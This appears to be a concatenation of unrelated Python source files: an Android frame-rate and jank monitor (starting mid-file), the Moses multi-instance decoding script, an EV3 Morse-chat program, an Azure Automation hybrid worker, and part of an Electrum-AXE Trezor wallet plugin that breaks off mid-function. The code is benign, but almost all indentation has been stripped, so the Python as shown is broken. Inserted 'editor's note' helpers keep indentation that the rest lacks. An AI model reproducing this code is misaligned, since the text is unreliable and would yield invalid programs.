# 7657500793457 7657516600576 7657527404785
# (...)
#
# The first line is the refresh period (here 16.95 ms), it is followed
# by 128 lines w/ 3 timestamps in nanosecond each:
# A) when the app started to draw
# B) the vsync immediately preceding SF submitting the frame to the h/w
# C) timestamp immediately after SF submitted that frame to the h/w
#
# The difference between the 1st and 3rd timestamp is the frame-latency.
# An interesting case is when the frame latency crosses a refresh-period
# boundary; this can be calculated this way:
#
# ceil((C - A) / refresh-period)
#
# (each time the number above changes, we have a "jank").
# If this happens a lot during an animation, the animation appears
# janky, even if it runs at 60 fps on average.
#
# Google Pixel 2, Android 8.0: output of "dumpsys SurfaceFlinger --latency"
# 16666666
# 0 0 0
# 0 0 0
# 0 0 0
# 0 0 0
# On a Huawei Honor 9 (Android 8.0) the "dumpsys SurfaceFlinger --latency" output looks normal,
# but the data updates very slowly and cannot be used to compute fps either
# 16666666
# 9223372036854775807 3618832932780 9223372036854775807
# 9223372036854775807 3618849592155 9223372036854775807
# 9223372036854775807 3618866251530 9223372036854775807
# Google Pixel 2, Android 8.0: output of "dumpsys SurfaceFlinger --latency <window>"
# C:\Users\luke01>adb -s HT7B81A05143 shell dumpsys SurfaceFlinger --latency com.n
# etease.apm/com.example.sdkapp.TestListView
# 16666666
refresh_period = None
timestamps = []
nanoseconds_per_second = 1e9
pending_fence_timestamp = (1 << 63) - 1
if self.device.adb.get_sdk_version() >= 26:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
refresh_period = int(results[0]) / nanoseconds_per_second
results = self.device.adb.run_shell_cmd('dumpsys gfxinfo %s framestats'%self.package_name)
# logger.debug(results)
# Reshape the "dumpsys gfxinfo package_name framestats" output into the same form as the
# "dumpsys SurfaceFlinger --latency" output, so fps and jank can be computed uniformly below
results = results.replace("\r\n","\n").splitlines()
if not len(results):
return (None, None)
isHaveFoundWindow = False
PROFILEDATA_line = 0
for line in results:
if not isHaveFoundWindow:
if "Window" in line and self.focus_window in line:
isHaveFoundWindow = True
# logger.debug("Window line:"+line)
if not isHaveFoundWindow:
continue
if "PROFILEDATA" in line:
PROFILEDATA_line +=1
fields = []
fields = line.split(",")
if fields and '0' == fields[0]:
# logger.debug(line)
# get the INTENDED_VSYNC, VSYNC and FRAME_COMPLETED times; VSYNC is used to compute fps and jank
timestamp = [int(fields[1]),int(fields[2]),int(fields[13])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
# stop once the next window is reached
if 2 == PROFILEDATA_line:
break
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency %s'%self.focus_window)
results = results.replace("\r\n","\n").splitlines()
logger.debug("dumpsys SurfaceFlinger --latency result:")
logger.debug(results)
if not len(results):
return (None, None)
if not results[0].isdigit():
return (None, None)
try:
refresh_period = int(results[0]) / nanoseconds_per_second
except Exception as e:
logger.exception(e)
return (None, None)
# If a fence associated with a frame is still pending when we query the
# latency data, SurfaceFlinger gives the frame a timestamp of INT64_MAX.
# Since we only care about completed frames, we will ignore any timestamps
# with this value.
for line in results[1:]:
fields = line.split()
if len(fields) != 3:
continue
timestamp = [int(fields[0]),int(fields[1]),int(fields[2])]
if timestamp[1] == pending_fence_timestamp:
continue
timestamp = [_timestamp / nanoseconds_per_second for _timestamp in timestamp]
timestamps.append(timestamp)
return (refresh_period, timestamps)
def _get_surface_stats_legacy(self):
"""Legacy method (before JellyBean), returns the current Surface index
and timestamp.
Calculate FPS by measuring the difference of Surface index returned by
SurfaceFlinger in a period of time.
Returns:
Dict of {page_flip_count (or 0 if there was an error), timestamp}.
"""
cur_surface = None
timestamp = datetime.datetime.now()
# this command may require root
ret = self.device.adb.run_shell_cmd("service call SurfaceFlinger 1013")
if not ret :
return None
match = re.search('^Result: Parcel\((\w+)', ret)
if match :
cur_surface = int(match.group(1), 16)
return {'page_flip_count': cur_surface,'timestamp': timestamp}
return None
class FPSMonitor(Monitor):
'''FPS monitor'''
def __init__(self, device_id, package_name = None,frequency=1.0,timeout =24 * 60 * 60,fps_queue=None,jank_threshold=166, use_legacy = False):
'''Constructor
:param str device_id: device id
:param float frequency: sampling frequency for frame-rate statistics, default 1 second
:param int jank_threshold: threshold for counting jank, in milliseconds; default is 10 vsync periods (166 ms)
:param bool use_legacy: when True, always use page_flip to measure the frame rate, which reflects
the refresh rate of the full-screen content. When not specified, on systems above Android 4.1 the
refresh rate of the currently focused Activity is measured.
'''
self.use_legacy = use_legacy
self.frequency = frequency  # sampling frequency
self.jank_threshold = jank_threshold
self.device = AndroidDevice(device_id)
self.timeout = timeout
if not package_name:
package_name = self.device.adb.get_foreground_process()
self.package = package_name
self.fpscollector = SurfaceStatsCollector(self.device, self.frequency, package_name,fps_queue,self.jank_threshold, self.use_legacy)
def start(self,start_time):
'''Start the FPSMonitor'''
if not RuntimeData.package_save_path:
RuntimeData.package_save_path = os.path.join(os.path.abspath(os.path.join(os.getcwd(), "../..")),'results', self.package, start_time)
if not os.path.exists(RuntimeData.package_save_path):
os.makedirs(RuntimeData.package_save_path)
self.start_time = start_time
self.fpscollector.start(start_time)
logger.debug('FPS monitor has started!')
def stop(self):
'''Stop the FPSMonitor'''
self.fpscollector.stop()
logger.debug('FPS monitor has stopped!')
def save(self):
pass
def parse(self, file_path):
'''Parse
:param str file_path: path of the data file to parse
'''
pass
def get_fps_collector(self):
'''Get the fps collector, which holds the list of time/fps/jank entries
:return: fps collector
:rtype: SurfaceStatsCollector
'''
return self.fpscollector
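# Editor's note: an illustrative, self-contained sketch (not part of the original
# module) of the jank rule implemented by SurfaceStatsCollector._calculate_janky().
# Each row is [draw_start, vsync, frame_completed] in seconds; a frame counts as
# jank when the gap between consecutive vsync timestamps exceeds the threshold
# (10 vsync periods, 166 ms by default).  The timestamps below are made up.
def _example_jank_count():
    threshold = 166 / 1000.0
    timestamps = [
        [0.0, 1.000, 0.0],
        [0.0, 1.017, 0.0],   # 17 ms gap  -> smooth
        [0.0, 1.200, 0.0],   # 183 ms gap -> jank
        [0.0, 1.217, 0.0],   # 17 ms gap  -> smooth
    ]
    jank = 0
    prev_vsync = None
    for _, vsync, _ in timestamps:
        if prev_vsync is not None and (vsync - prev_vsync) > threshold:
            jank += 1
        prev_vsync = vsync
    return jank   # -> 1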
if __name__ == '__main__':
# tulanduo android8.0 api level 27
monitor = FPSMonitor('TC79SSDMO7HEY5Z9',"com.alibaba.ailabs.genie.smartapp",1)
# mate 9 android8.0
# monitor = FPSMonitor('MKJNW18226007860',"com.sankuai.meituan",2)
# android8.0 Google Pixel 2
# monitor = FPSMonitor('HT7B81A05143',package_name = "com.alibaba.ailibs.genie.contacts",1)
monitor.start(TimeUtils.getCurrentTimeUnderline())
time.sleep(600)
monitor.stop()
|
multi_moses.py
|
#!/usr/bin/env python
# Written by Michael Denkowski
#
# This file is part of moses. Its use is licensed under the GNU Lesser General
# Public License version 2.1 or, at your option, any later version.
'''Parallelize decoding with multiple instances of moses on a local machine
To use with mert-moses.pl, activate --multi-moses and set the number of moses
instances and threads per instance with --decoder-flags='--threads P:T:E'
This script runs a specified number of moses instances, each using one or more
threads. The highest speed is generally seen with many single-threaded
instances while the lowest memory usage is seen with a single many-threaded
instance. It is recommended to use the maximum number of instances that will
fit into memory (up to the number of available CPUs) and distribute CPUs across
them equally. For example, a machine with 32 CPUs that can fit 3 copies of
moses into memory would use --threads 2:11:10 for 2 instances with 11 threads
each and an extra instance with 10 threads (3 instances total using all CPUs).
Memory mapped models can be shared by multiple processes and increase the number
of instances that can fit into memory:
Mmapped phrase tables (Ulrich Germann)
http://www.statmt.org/moses/?n=Advanced.Incremental#ntoc3
Mmapped language models (Kenneth Heafield)
http://www.statmt.org/moses/?n=FactoredTraining.BuildingLanguageModel#ntoc19
'''
import collections
import gzip
import os
import Queue
import signal
import subprocess
import sys
import threading
HELP = '''Multiple process decoding with Moses
Usage:
{} moses --config moses.ini [options] [decoder flags]
Options:
--threads P:T:E
P: Number of parallel instances to run
T: Number of threads per instance
E: Number of threads in optional extra instance
(default 1:1:0, overrides [threads] in moses.ini. Specifying T
and E is optional, e.g. --threads 16 starts 16 single-threaded
instances)
--n-best-list nbest.out N [distinct]: location and size of N-best list
--show-weights: for mert-moses.pl, just call moses and exit
Other options (decoder flags) are passed through to moses instances
'''
# Defaults
INPUT = sys.stdin
PROCS = 1
THREADS = 1
EXTRA = 0
DONE = threading.Event()
PID = os.getpid()
# A very long time, used as Queue operation timeout even though we don't
# actually want a timeout but we do want interruptibility
# (https://bugs.python.org/issue1360)
NEVER = 60 * 60 * 24 * 365 * 1000
# Single unit of computation: decode a line, output result, signal done
Task = collections.namedtuple('Task', ['id', 'line', 'out', 'event'])
def kill_main(msg):
'''kill -9 the main thread to stop everything immediately'''
sys.stderr.write('{}\n'.format(msg))
os.kill(PID, signal.SIGKILL)
def gzopen(f):
'''Open plain or gzipped text'''
return gzip.open(f, 'rb') if f.endswith('.gz') else open(f, 'r')
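# Editor's note: an illustrative helper (not part of the original script) showing
# how the --threads P:T:E value described in the module docstring maps onto
# (instances, threads per instance, threads for the optional extra instance).
# main() does the same parsing inline; this standalone version is only a sketch.
def _parse_threads_spec(spec):
    '''"16" -> (16, 1, 0); "2:11:10" -> (2, 11, 10)'''
    parts = spec.split(':')
    procs = int(parts[0])
    threads = int(parts[1]) if len(parts) > 1 else THREADS
    extra = int(parts[2]) if len(parts) > 2 else EXTRA
    return (procs, threads, extra)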
def run_instance(cmd_base, threads, tasks, n_best=False):
'''Run an instance of moses that processes tasks (input lines) from a
queue using a specified number of threads'''
cmd = cmd_base[:]
cmd.append('--threads')
cmd.append(str(threads))
try:
# Queue of tasks instance is currently working on, limited to the number
# of threads * 2 (minimal buffering). The queue should be kept full for
# optimal CPU usage.
work = Queue.Queue(maxsize=(threads * 2))
# Multi-threaded instance
moses = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Read and handle instance output as available
def handle_output():
while True:
# Output line triggers task completion
line = moses.stdout.readline()
# End of output (instance finished)
if not line:
break
task = work.get(timeout=NEVER)
if n_best:
# Read and copy lines until sentinel line, copy real line id
# id ||| hypothesis words ||| feature scores ||| total score
(first_i, rest) = line.split(' ||| ', 1)
task.out.append(' ||| '.join((task.id, rest)))
while True:
line = moses.stdout.readline()
(i, rest) = line.split(' ||| ', 1)
# Sentinel
if i != first_i:
break
task.out.append(' ||| '.join((task.id, rest)))
else:
task.out.append(line)
# Signal task done
task.event.set()
# Output thread
handler = threading.Thread(target=handle_output, args=())
# Daemon: guaranteed to finish before non-daemons
handler.setDaemon(True)
handler.start()
# Input thread: take tasks as they are available and add them to work
# queue. Stop when DONE encountered.
while True:
task = tasks.get(timeout=NEVER)
work.put(task, timeout=NEVER)
if task.event == DONE:
break
if n_best:
# Input line followed by blank line (sentinel)
moses.stdin.write(task.line)
moses.stdin.write('\n')
else:
moses.stdin.write(task.line)
# Cleanup
moses.stdin.close()
moses.wait()
handler.join()
except:
kill_main('Error with moses instance: see stderr')
def write_results(results, n_best=False, n_best_out=None):
'''Write out results (output lines) from a queue as they are populated'''
while True:
task = results.get(timeout=NEVER)
if task.event == DONE:
break
task.event.wait()
if n_best:
# Write top-best and N-best
# id ||| hypothesis words ||| feature scores ||| total score
top_best = task.out[0].split(' ||| ', 2)[1]
# Except don't write top-best if writing N-best to stdout "-"
if n_best_out != sys.stdout:
sys.stdout.write('{}\n'.format(top_best))
sys.stdout.flush()
for line in task.out:
n_best_out.write(line)
n_best_out.flush()
else:
sys.stdout.write(task.out[0])
sys.stdout.flush()
def main(argv):
# Defaults
moses_ini = None
input = INPUT
procs = PROCS
threads = THREADS
extra = EXTRA
n_best = False
n_best_file = None
n_best_size = None
n_best_distinct = False
n_best_out = None
show_weights = False
# Decoder command
cmd = argv[1:]
# Parse special options and remove from cmd
i = 1
while i < len(cmd):
if cmd[i] in ('-f', '-config', '--config'):
moses_ini = cmd[i + 1]
# Do not remove from cmd
i += 2
elif cmd[i] in ('-i', '-input-file', '--input-file'):
input = gzopen(cmd[i + 1])
cmd = cmd[:i] + cmd[i + 2:]
elif cmd[i] in ('-th', '-threads', '--threads'):
# P:T:E
args = cmd[i + 1].split(':')
procs = int(args[0])
if len(args) > 1:
threads = int(args[1])
if len(args) > 2:
extra = int(args[2])
cmd = cmd[:i] + cmd[i + 2:]
elif cmd[i] in ('-n-best-list', '--n-best-list'):
n_best = True
n_best_file = cmd[i + 1]
n_best_size = cmd[i + 2]
# Optional "distinct"
if i + 3 < len(cmd) and cmd[i + 3] == 'distinct':
n_best_distinct = True
cmd = cmd[:i] + cmd[i + 4:]
else:
cmd = cmd[:i] + cmd[i + 3:]
# Handled specially for mert-moses.pl
elif cmd[i] in ('-show-weights', '--show-weights'):
show_weights = True
# Do not remove from cmd
i += 1
else:
i += 1
# If mert-moses.pl passes -show-weights, just call moses
if show_weights:
sys.stdout.write(subprocess.check_output(cmd))
sys.stdout.flush()
return
# Check inputs
if not (len(cmd) > 0 and moses_ini):
sys.stderr.write(HELP.format(os.path.basename(argv[0])))
sys.exit(2)
if not (os.path.isfile(cmd[0]) and os.access(cmd[0], os.X_OK)):
raise Exception('moses "{}" is not executable\n'.format(cmd[0]))
# Report settings
sys.stderr.write('Moses flags: {}\n'.format(' '.join('\'{}\''.format(s) if ' ' in s else s for s in cmd[1:])))
sys.stderr.write('Instances: {}\n'.format(procs))
sys.stderr.write('Threads per: {}\n'.format(threads))
if extra:
sys.stderr.write('Extra: {}\n'.format(extra))
if n_best:
sys.stderr.write('N-best list: {} ({}{})\n'.format(n_best_file, n_best_size, ', distinct' if n_best_distinct else ''))
# Task and result queues (buffer 8 * total threads input lines)
tasks = Queue.Queue(maxsize=(8 * ((procs * threads) + extra)))
results = Queue.Queue()
# N-best capture
if n_best:
cmd.append('--n-best-list')
cmd.append('-')
cmd.append(n_best_size)
if n_best_distinct:
cmd.append('distinct')
if n_best_file == '-':
n_best_out = sys.stdout
else:
n_best_out = open(n_best_file, 'w')
# Start instances
instances = []
for i in range(procs + (1 if extra else 0)):
t = threading.Thread(target=run_instance, args=(cmd, (threads if i < procs else extra), tasks, n_best))
instances.append(t)
# Daemon: guaranteed to finish before non-daemons
t.setDaemon(True)
t.start()
# Start results writer
writer = threading.Thread(target=write_results, args=(results, n_best, n_best_out))
writer.start()
# Main loop: queue task for each input line
id = 0
while True:
line = input.readline()
if not line:
break
# (line id, input line, output lines, "done" event)
task = Task(str(id), line, [], threading.Event())
results.put(task, timeout=NEVER)
tasks.put(task, timeout=NEVER)
id += 1
# Tell instances to exit
for t in instances:
tasks.put(Task(None, None, None, DONE), timeout=NEVER)
for t in instances:
t.join()
# Stop results writer
results.put(Task(None, None, None, DONE), timeout=NEVER)
writer.join()
# Cleanup
if n_best:
n_best_out.close()
if __name__ == '__main__':
try:
main(sys.argv)
except:
kill_main('Error with main I/O: see stderr')
|
bttrc_ev3.py
|
#!/usr/bin/env python3
#
# Back To The Roots Communication
#
# 2020 - Rafael Urben | Matthew Haldimann
#
from bttrc import Chat, Morse, Printer
from multiprocessing import Process
import time
def processQueue():
Printer.processQueue()
def morse2chat():
while True:
Chat.send(Morse.enterText())
def chat2print():
while True:
txt = Chat.receive()
if not "//NOPRINT//" in txt:
Printer.addToQueue(txt.rstrip())
Printer.addToQueue(" ")
Chat.send("[BTTRC] - Nachricht erhalten!", nosound=True)
if __name__ == "__main__":
from ev3dev2.button import Button
from ev3dev2.led import Leds
l = Leds()
b = Button()
l.all_off()
l.set_color("LEFT", "RED")
l.set_color("RIGHT", "RED")
print("[BTTRC] - Starten...")
printprocess = Process(target=processQueue)
printprocess.start()
chat2printprocess = Process(target=chat2print)
chat2printprocess.start()
morse2chatprocess = Process(target=morse2chat)
morse2chatprocess.start()
Chat.send("[BTTRC] - Gestartet!", nosound=True)
print("[BTTRC] - Gestartet!")
b.wait_for_bump("left")
print("[BTTRC] - Beenden...")
printprocess.terminate()
chat2printprocess.terminate()
morse2chatprocess.terminate()
Chat.send("[BTTRC] - Beendet!", nosound=True)
print("[BTTRC] - Beendet!")
l.all_off()
|
hybridworker.py
|
#!/usr/bin/env python3
# ====================================
# Copyright (c) Microsoft Corporation. All rights reserved.
# ====================================
import configparser
import os
import platform
import shutil
import subprocess
import sys
import threading
import time
import traceback
# import worker module after linuxutil.daemonize() call
sandboxes_root_folder_name = "sandboxes"
def safe_loop(func):
def decorated_func(*args, **kwargs):
while True:
try:
# ensure required file / cert exists
func(*args, **kwargs)
except (JrdsAuthorizationException,
InvalidFilePermissionException,
FileNotFoundException,
SystemExit):
tracer.log_worker_safe_loop_terminal_exception(traceback.format_exc())
time.sleep(1) # allow the trace to make it to stdout (since traces are background threads)
sys.exit(-1)
except Exception:
tracer.log_worker_safe_loop_non_terminal_exception(traceback.format_exc())
time.sleep(configuration.get_jrds_get_sandbox_actions_polling_freq())
return decorated_func
def background_thread(func):
def decorated_func(*args, **kwargs):
t = threading.Thread(target=func, args=args)
t.daemon = True
t.start()
return decorated_func
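# Editor's note: an illustrative sketch (not part of the original worker) of how
# the two decorators above combine: @background_thread moves a callable onto a
# daemon thread, and @safe_loop keeps re-running its body at the configured
# polling frequency, logging non-terminal exceptions and exiting the process on
# terminal ones.  The names below are hypothetical.
def _example_polling_loop(do_one_poll):
    @background_thread
    @safe_loop
    def _poll():
        do_one_poll()
    _poll()   # returns immediately; polling continues on a daemon thread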
def exit_on_error(message, exit_code=1):
crash_log_filename = "automation_worker_crash.log"
util.exit_on_error(filename=crash_log_filename, message=message, exit_code=exit_code)
def test_file_creation(path):
try:
iohelper.write_to_file(path, path)
os.remove(path)
return True
except IOError:
return False
def validate_and_setup_path():
# default to user dir for exception logs to be written to disk
test_file_name = "test_file"
# test certificate and key path
if not os.path.isfile(configuration.get_jrds_cert_path()) or not os.path.isfile(configuration.get_jrds_key_path()):
exit_on_error("Invalid certificate of key file path (absolute path is required).")
# test working directory for existence and permissions
working_directory_path = configuration.get_working_directory_path()
if not os.path.exists(working_directory_path):
exit_on_error("Invalid working directory path (absolute path is required).")
file_creation = test_file_creation(os.path.join(working_directory_path, test_file_name))
if file_creation is False:
exit_on_error("Invalid working directory permission (read/write permissions are required).")
# test state file path
if configuration.get_state_directory_path() != configuration.DEFAULT_STATE_DIRECTORY_PATH:
if not os.path.exists(configuration.get_state_directory_path()):
exit_on_error("Invalid state directory path (absolute path is required).")
file_creation = test_file_creation(os.path.join(configuration.get_state_directory_path(), test_file_name))
if file_creation is False:
exit_on_error("Invalid state directory permission (read/write permissions are required).")
# OMS integration
# set the working directory owner to be nxautomation:omiusers
if os.name.lower() != "nt":
import pwd
try:
nxautomation_uid = int(pwd.getpwnam('nxautomation').pw_uid)
if os.getuid() == nxautomation_uid:
retval = subprocess.call(["sudo", "chown", "-R", "nxautomation:omiusers", working_directory_path])
if retval != 0:
exit_on_error("Could not change owner of working directory %s to nxautomation:omiusers"
% (working_directory_path))
except KeyError:
# nxautomation user was not found on the system, skip this step
tracer.log_debug_trace("Ownership change of working directory skipped. nxautomation user not found.")
pass
def generate_state_file():
# skip state file if the worker is managed by the worker manager
if len(sys.argv) >= 3 and str(sys.argv[2]) == "managed":
return
state_file_name = "state.conf"
if configuration.get_state_directory_path() == configuration.DEFAULT_STATE_DIRECTORY_PATH:
state_file_path = os.path.join(configuration.get_working_directory_path(), state_file_name)
else:
state_file_path = os.path.join(configuration.get_state_directory_path(), state_file_name)
tracer.log_debug_trace("State file path : " + str(state_file_path))
if os.path.isfile(state_file_path):
os.remove(state_file_path)
section = "state"
conf_file = open(state_file_path, 'w')
config = configparser.ConfigParser()
config.add_section(section)
config.set(section, configuration.STATE_PID, str(os.getpid()))
config.set(section, configuration.WORKER_VERSION, str(configuration.get_worker_version()))
# for OMS scenarios, optional for DIY
if len(sys.argv) >= 3:
config.set(section, configuration.STATE_WORKSPACE_ID, str(sys.argv[2]))
if len(sys.argv) >= 4:
config.set(section, configuration.STATE_RESOURCE_VERSION, str(sys.argv[3]))
config.write(conf_file)
conf_file.close()
# OMS integration
# set the ownership of the state file to nxautomation:omiusers
# set the permission of the state file to 660
if os.name.lower() != "nt":
import pwd
try:
nxautomation_uid = int(pwd.getpwnam('nxautomation').pw_uid)
if os.getuid() == nxautomation_uid:
retval = subprocess.call(["sudo", "chown", "nxautomation:omiusers", state_file_path])
if retval != 0:
exit_on_error(
"Could not change owner of state file %s to nxautomation:omiusers" % (state_file_path))
retval = subprocess.call(["sudo", "chmod", "660", state_file_path])
if retval != 0:
exit_on_error("Could not change permission of state file %s " % (state_file_path))
except KeyError:
# nxautomation user was not found on the system, skip this step
tracer.log_debug_trace("State file permission change skipped. nxautomation user not found.")
pass
class Worker(object):
def __init__(self):
tracer.log_worker_starting(configuration.get_worker_version())
http_client_factory = HttpClientFactory(configuration.get_jrds_cert_path(), configuration.get_jrds_key_path(),
configuration.get_verify_certificates())
http_client = http_client_factory.create_http_client(sys.version_info)
self.jrds_client = JRDSClient(http_client)
self.running_sandboxes = {}
@staticmethod
def assert_environment_prerequisite():
jrds_cert_path = configuration.get_jrds_cert_path()
if util.assert_file_read_permission(jrds_cert_path) is False:
raise InvalidFilePermissionException(jrds_cert_path)
jrds_key_path = configuration.get_jrds_key_path()
if util.assert_file_read_permission(jrds_key_path) is False:
raise InvalidFilePermissionException(jrds_key_path)
worker_conf_path = configuration.get_worker_configuration_file_path()
if util.assert_file_read_permission(worker_conf_path) is False:
raise InvalidFilePermissionException(worker_conf_path)
proxy_conf_path = configuration.get_proxy_configuration_path()
if proxy_conf_path != configuration.DEFAULT_PROXY_CONFIGURATION_PATH and os.path.isfile(proxy_conf_path):
if util.assert_file_read_permission(proxy_conf_path) is False:
raise InvalidFilePermissionException(proxy_conf_path)
@staticmethod
def construct_jrds_msi_endpoint(sandbox_id):
url = configuration.get_jrds_base_uri() + "/automationAccounts/" + configuration.get_account_id() + \
"/Sandboxes/" + sandbox_id + "/metadata/identity/oauth2/token"
return url
@safe_loop
def routine(self):
self.assert_environment_prerequisite()
self.stop_tracking_terminated_sandbox()
sandbox_actions = self.jrds_client.get_sandbox_actions()
if sandbox_actions is None:
tracer.log_get_sandbox_action_returned_null_data()
return
tracer.log_debug_trace("Get sandbox action. Found " + str(len(sandbox_actions)) + " action(s).")
for action in sandbox_actions:
tracer.log_worker_sandbox_action_found(len(sandbox_actions))
sandbox_id = str(action["SandboxId"])
# prevent duplicate sandbox from running
if sandbox_id in self.running_sandboxes:
continue
# create sandboxes folder if needed
sandbox_working_dir = os.path.join(configuration.get_working_directory_path(), sandboxes_root_folder_name,
sandbox_id)
try:
iohelper.assert_or_create_path(sandbox_working_dir)
except OSError as exception:
tracer.log_worker_failed_to_create_sandbox_root_folder(sandbox_id, exception)
raise SystemExit("Sandbox folder creation failed.")
# copy the current process env variables (contains configuration) and add the sandbox_id key
process_env_variables = os.environ.copy()
process_env_variables["sandbox_id"] = sandbox_id
msi_secret = str(action["MSISecret"])
if (msi_secret and msi_secret != "None"):
process_env_variables["MSI_SECRET"] = msi_secret
process_env_variables["MSI_ENDPOINT"] = self.construct_jrds_msi_endpoint(sandbox_id)
python_to_be_used = util.get_python_to_be_used()
print("Using %s" %(python_to_be_used))
cmd = [python_to_be_used, os.path.join(configuration.get_source_directory_path(), "sandbox.py"),
configuration.get_worker_configuration_file_path()]
tracer.log_worker_starting_sandbox(sandbox_id)
sandbox_process = subprocessfactory.create_subprocess(cmd=cmd,
env=process_env_variables,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=sandbox_working_dir)
self.running_sandboxes[sandbox_id] = sandbox_process
tracer.log_worker_started_tracking_sandbox(sandbox_id)
self.monitor_sandbox_process_outputs(sandbox_id, sandbox_process)
tracer.log_worker_sandbox_process_started(sandbox_id, str(sandbox_process.pid))
@background_thread
def monitor_sandbox_process_outputs(self, sandbox_id, process):
while process.poll() is None:
output = process.stdout.readline().decode().replace("\n", "")
if output == '':
continue
if output != '':
tracer.log_sandbox_stdout(output)
if process.poll() != 0:
full_error_output = ""
while True:
error_output = process.stderr.readline().decode()
if error_output is None or error_output == '':
break
full_error_output += error_output
tracer.log_worker_sandbox_process_crashed(sandbox_id, process.pid, process.poll(), full_error_output)
tracer.log_worker_sandbox_process_exited(sandbox_id, str(process.pid), process.poll())
# cleanup sandbox directory
sandbox_working_dir = os.path.join(configuration.get_working_directory_path(), sandboxes_root_folder_name,
sandbox_id)
shutil.rmtree(sandbox_working_dir, ignore_errors=True)
@background_thread
def telemetry_routine(self):
while True:
tracer.log_worker_general_telemetry(configuration.get_worker_version(), configuration.get_worker_type(),
linuxutil.get_current_username(), linuxutil.get_oms_agent_id())
tracer.log_worker_python_telemetry(platform.python_version(), platform.python_build(),
platform.python_compiler())
tracer.log_worker_system_telemetry(platform.system(), platform.node(), platform.version(),
platform.machine(), platform.processor())
try:
distributor_id, description, release, codename = linuxutil.get_lsb_release()
tracer.log_worker_lsb_release_telemetry(distributor_id, description, release, codename)
except:
pass
# sleep for 6 hours, this allows us to gather daily telemetry
time.sleep(60 * 60 * 6)
def stop_tracking_terminated_sandbox(self):
terminated_sandbox_ids = []
# detect terminated sandboxes
for sandbox_id, sandbox_process in list(self.running_sandboxes.items()):
if sandbox_process.poll() is not None:
terminated_sandbox_ids.append(sandbox_id)
# clean-up terminated sandboxes
for sandbox_id in terminated_sandbox_ids:
removal = self.running_sandboxes.pop(sandbox_id, None)
if removal is not None:
tracer.log_worker_stopped_tracking_sandbox(sandbox_id)
def main():
if len(sys.argv) < 2:
exit_on_error("Missing configuration file path.")
configuration_path = str(sys.argv[1])
if not os.path.isfile(configuration_path):
exit_on_error("Invalid configuration file path or empty configuration file (absolute path is required).")
# configuration has to be read first thing
try:
# remove the test_mode env_var value (mainly for Windows)
# this value is set in test
del os.environ["test_mode"]
except KeyError:
pass
configuration.read_and_set_configuration(configuration_path)
configuration.set_config({configuration.COMPONENT: "worker"})
validate_and_setup_path()
# do not trace anything before this point
generate_state_file()
worker = Worker()
worker.telemetry_routine()
worker.routine()
if __name__ == "__main__":
try:
import configuration3 as configuration
import iohelper
import subprocessfactory
import tracer
from httpclientfactory import HttpClientFactory
from jrdsclient import JRDSClient
from workerexception import *
import util
main()
except:
exit_on_error(traceback.format_exc())
|
trezor.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_axe.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_axe.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_axe import constants
from electrum_axe.i18n import _
from electrum_axe.plugin import BasePlugin, Device
from electrum_axe.transaction import deserialize, Transaction
from electrum_axe.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_axe.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
